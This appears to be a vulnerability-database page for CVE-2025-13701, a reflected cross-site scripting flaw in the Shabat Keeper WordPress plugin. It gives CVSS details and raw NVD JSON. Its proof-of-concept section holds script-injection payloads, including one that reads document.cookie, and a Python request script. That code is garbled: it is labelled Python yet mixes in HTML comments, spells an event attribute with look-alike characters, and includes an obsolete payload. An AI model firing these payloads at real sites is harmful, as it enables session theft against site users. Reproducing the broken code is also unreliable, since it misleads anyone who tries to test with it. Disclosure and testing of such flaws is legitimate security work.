Security Vulnerability Report
中文
CVE-2025-13701 CVSS 6.1 MEDIUM

CVE-2025-13701

Published: 2026-01-09 12:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Shabat Keeper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] parameter in all versions up to, and including, 0.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Shabat Keeper plugin for WordPress ≤ 0.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-13701 PoC - Reflected XSS in Shabat Keeper --> <!-- 攻击者构造恶意URL,诱导受害者点击 --> <!-- 恶意链接示例 --> <!-- https://target-site.com/wp-admin/admin.php/" οnmοuseοver="alert(document.domain) style="x:expression(open(alert('XSS'))"> --> <!-- 实际攻击payload --> <!-- 将以下payload注入到PHP_SELF参数中 --> payload = '"><script>alert(String.fromCharCode(88,83,83))</script>' <!-- 完整恶意URL示例 --> <!-- https://vulnerable-site.com/wp-admin/admin.php/<payload> --> <!-- 自动化测试Python脚本 --> import requests target_url = "http://vulnerable-site.com/wp-admin/admin.php" payload = '<script>alert(document.cookie)</script>' malicious_url = f"{target_url}/{payload}" response = requests.get(malicious_url) if payload in response.text: print("[+] XSS vulnerability confirmed!") else: print("[-] No XSS vulnerability detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13701", "sourceIdentifier": "[email protected]", "published": "2026-01-09T12:15:51.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shabat Keeper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] parameter in all versions up to, and including, 0.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Shabat Keeper para WordPress es vulnerable a cross-site scripting reflejado a través del parámetro $_SERVER['PHP_SELF'] en todas las versiones hasta la 0.4.4, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/shabat-keeper/tags/0.4.4/shabat-keeper.php#L148", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/shabat-keeper/trunk/shabat-keeper.php#L148", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3aa73be6-0836-4540-8a80-e1da34c0ee0d?source=cve", "source": "[email protected]"}]}}